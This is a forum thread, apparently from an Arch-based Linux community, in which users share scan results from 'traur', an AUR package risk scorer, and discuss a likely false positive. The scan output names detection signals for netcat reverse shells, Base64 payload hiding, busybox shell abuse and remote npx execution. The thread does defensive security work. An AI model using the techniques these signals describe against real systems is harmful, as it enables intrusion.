New interesting tool has been released.
“New Rust Tool Traur Analyzes Arch AUR Packages for Hidden Risks”
“you can install it directly from the AUR. For more information, see the tool’s GitHub page.”
Now we just need a tool to check this one…
7 Likes
~ traur scan ✔ took 1m 35s at 03:06:14 PM
Scanning 49 installed AUR packages...
Fetching package metadata...
Got metadata for 49/49 packages
Fetching maintainer data for 38 unique maintainers...
=== traur scan results ===
Scanned: 49 packages (0 errors)
TRUSTED: 35 OK: 11 SKETCHY: 3 SUSPICIOUS: 0 MALICIOUS: 0
=== 3 flagged packages (SKETCHY+) ===
traur: radarr-develop (trust: 53/100)
Trust: SKETCHY
Negative signals:
! P-SYSTEMD-CREATE: Creating/enabling systemd service
M-VOTES-LOW: Package has very few votes (1)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 117)
traur: sonarr-develop (trust: 53/100)
Trust: SKETCHY
Negative signals:
! P-SYSTEMD-CREATE: Creating/enabling systemd service
M-VOTES-LOW: Package has very few votes (2)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 119)
traur: angrysearch (trust: 54/100)
Trust: SKETCHY
Negative signals:
! P-PYTHON-INLINE: Python inline code execution
! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
B-MAINTAINER-SINGLE: Maintainer has only 1 package
T-AUTHOR-CHANGE: Git history shows multiple different authors
2 Likes
❯ traur scan
Scanning 21 installed AUR packages...
Fetching package metadata...
Got metadata for 21/21 packages
Fetching maintainer data for 17 unique maintainers...
=== traur scan results ===
Scanned: 21 packages (0 errors)
TRUSTED: 13 OK: 7 SKETCHY: 1 SUSPICIOUS: 0 MALICIOUS: 0
=== 1 flagged packages (SKETCHY+) ===
traur: python-steam (trust: 58/100)
Trust: SKETCHY
Negative signals:
! B-TYPOSQUAT: Name 'python-steam' embeds popular package 'steam'
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'python' (line 24)
2 Likes
traur scan
Scanning 18 installed AUR packages...
Fetching package metadata...
Got metadata for 18/18 packages
Fetching maintainer data for 17 unique maintainers...
=== traur scan results ===
Scanned: 18 packages (0 errors)
TRUSTED: 12 OK: 4 SKETCHY: 2 SUSPICIOUS: 0 MALICIOUS: 0
=== 2 flagged packages (SKETCHY+) ===
traur: freetube-bin (trust: 51/100)
Trust: SKETCHY
Negative signals:
! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
! P-CHECKSUM-MISMATCH: source_x86_64 count (3) != sha256sums_x86_64 count (1)
! P-CHECKSUM-MISMATCH: source_aarch64 count (3) != sha256sums_aarch64 count (1)
T-AUTHOR-CHANGE: Git history shows multiple different authors
traur: peazip (trust: 57/100)
Trust: SKETCHY
Negative signals:
! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 123)
3 Likes
╰─❯ traur scan
Scanning 45 installed AUR packages...
Fetching package metadata...
Got metadata for 45/45 packages
Fetching maintainer data for 39 unique maintainers...
=== traur scan results ===
Scanned: 45 packages (0 errors)
TRUSTED: 35 OK: 8 SKETCHY: 2 SUSPICIOUS: 0 MALICIOUS: 0
=== 2 flagged packages (SKETCHY+) ===
traur: shutthefetchup-git (trust: 49/100)
Trust: SKETCHY
Negative signals:
!! P-BASE64: Base64 decoding (possible payload hiding)
P-WEAK-CHECKSUMS: Using weak checksums (md5/sha1) without stronger alternative
M-VOTES-LOW: Package has very few votes (2)
T-SINGLE-COMMIT: Git history has only 1 commit
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 8)
! SA-HIGH-ENTROPY-HEREDOC: heredoc with high entropy (5.3 bits/byte, 673 bytes)
traur: shell-color-scripts-git (trust: 51/100)
Trust: SKETCHY
Negative signals:
! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
M-VOTES-LOW: Package has very few votes (1)
T-SINGLE-COMMIT: Git history has only 1 commit
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 4)
2 Likes
Intresting to see everyone’s results running this tool, I’m gonna have to try it out my self when I get some time.
BTW there are some limitations atm with this tool see here:
But sice it’s a new tool thy probably gonna fix/add this soon.
Although i think this has a few flaws it certainly can help AUR maintainers to update their packages/build scripts, to prevent issues in the future.
Like sha checksums missing or mismatching sources
A lot of “sketchy” warnings are not directly link to a problem, like low votes. But a lot of maintainer changes can be a warning sign
[richardc@richard-ms7c91 ~]$ traur
Trust scoring for AUR packages
Usage: traur
Commands:
scan Scan a package (or all installed AUR packages if none specified)
allow Whitelist a package (skip future scans)
bench Benchmark scanning the N most recently modified AUR packages
help Print this message or the help of the given subcommand(s)
Options:
-h, –help Print help
[richardc@richard-ms7c91 ~]$ traur scan
Scanning 38 installed AUR packages…
Fetching package metadata…
Got metadata for 38/38 packages
Fetching maintainer data for 32 unique maintainers…
=== traur scan results ===
Scanned: 38 packages (0 errors)
TRUSTED: 28 OK: 8 SKETCHY: 2 SUSPICIOUS: 0 MALICIOUS: 0
=== 2 flagged packages (SKETCHY+) ===
traur: python-ewmh (trust: 53/100)
Trust: SKETCHY
Negative signals:
! P-CHECKSUM-MISMATCH: source count (3) != sha256sums count (1)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to ‘python’ (line 7)
traur: octopi (trust: 60/100)
Trust: SKETCHY
Negative signals:
! P-EVAL-VAR: Dynamic code execution via eval
! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
T-AUTHOR-CHANGE: Git history shows multiple different authors
[richardc@richard-ms7c91 ~]$
This is what my system shows . . .
Rich 
Apparently, Megasync is “malicious”?
╰─❯ traur scan
Scanning 19 installed AUR packages...
Fetching package metadata...
Got metadata for 19/19 packages
Fetching maintainer data for 17 unique maintainers...
=== traur scan results ===
Scanned: 19 packages (0 errors)
TRUSTED: 13 OK: 2 SKETCHY: 3 SUSPICIOUS: 0 MALICIOUS: 1
=== 4 flagged packages (SKETCHY+) ===
traur: megasync (trust: 5/100)
Trust: MALICIOUS
!! Override gate fired: P-REVSHELL-NC
Negative signals:
!! P-REVSHELL-NC: Netcat reverse shell
! P-CHECKSUM-MISMATCH: source count (7) != sha256sums count (5)
traur: freetube-bin (trust: 51/100)
Trust: SKETCHY
Negative signals:
! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
! P-CHECKSUM-MISMATCH: source_x86_64 count (3) != sha256sums_x86_64 count (1)
! P-CHECKSUM-MISMATCH: source_aarch64 count (3) != sha256sums_aarch64 count (1)
T-AUTHOR-CHANGE: Git history shows multiple different authors
traur: python-steam (trust: 58/100)
Trust: SKETCHY
Negative signals:
! B-TYPOSQUAT: Name 'python-steam' embeds popular package 'steam'
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'python' (line 24)
traur: proton-ge-custom-bin (trust: 58/100)
Trust: SKETCHY
Negative signals:
! B-TYPOSQUAT: Name 'proton-ge-custom-bin' embeds popular package 'proton-ge-custom'
T-AUTHOR-CHANGE: Git history shows multiple different authors
! SA-VAR-CONCAT-CMD: variable concatenation resolves to 'sh' (line 68)
╰─❯
1 Like
This means, afaik, that this AUR package uses 7 different sources (urls) but only 5 of them use sha256sums (2 don’t and might be malicious?)
While this can be a warning sign it does not mean it is malicious, only that those sources used don’t have any checksum.
2 Likes
Same goes for this example
So yes there are multiple people who contribute to this, and yes it could be possible that one of them can/has added malicious code. But it doesn’t prove anything, only that the possibility can exists
1 Like
I don’t know what this means though
@fred666, thanks for the clarification. While generally a useful tool, it seems that Traur can needlessly worry someone about installed AUR packages.
According to Google’s AI overview:
“A Netcat reverse shell (often referred to asp-revshell-nc in specialized tools) is a technique used in cybersecurity to gain remote access to a target machine. In a reverse shell, the target machine initiates an outbound connection back to the attacker’s machine, which is listening for the connection. This method is highly effective for bypassing firewall restrictions that typically block incoming connections but allow outgoing traffic.”
I think this should be used to get an idea about a AUR package but the outcome should not be blindly interpreted.
And yes it can get the user worried, while that does not directly mean it should
1 Like
Right so this can be a serious warning, it all depends on how the AUR program or build script is using this. I have no further knowledge of this
1 Like
I think this is why it is being flagged as malicious. However, unless I am missing something, this looks like a potential false positive.
It may be finding nc because it is in Megasync.
2 Likes
Certainly possible
I think it is flagging this line:
git -C MEGAsync -c protocol.file.allow='always' submodule update
Because is contains nc -c.
You might want to report that to the traur maintainer.
3 Likes
My scan results are “sketchy”
traur: python-npx (trust: 47/100)
Trust: SKETCHY
Negative signals:
! P-PYTHON-INLINE: Python inline code execution
M-VOTES-LOW: Package has very few votes (2)
M-POP-ZERO: Popularity is 0 (no recent usage)
T-AUTHOR-CHANGE: Git history shows multiple different authors
! G-DOWNLOAD-NODE: Node.js HTTP download or npx remote execution
traur: ventoy (trust: 55/100)
Trust: SKETCHY
Negative signals:
P-HTTP-SOURCE: Plain HTTP source URL (no TLS, MITM risk)
! P-CHECKSUM-MISMATCH: source count (71) != sha256sums count (57)
!! G-BUSYBOX-SHELL: Busybox shell/network subcommand abuse
traur: epsonscan2-non-free-plugin (trust: 59/100)
Trust: SKETCHY
Negative signals:
!! P-BASE64: Base64 decoding (possible payload hiding)
! P-NO-CHECKSUMS: No checksum array found in PKGBUILD
P-BASE64: Base64 decoding (possible payload hiding)
This is probably because the source is closed, so no way of knowing what happens inside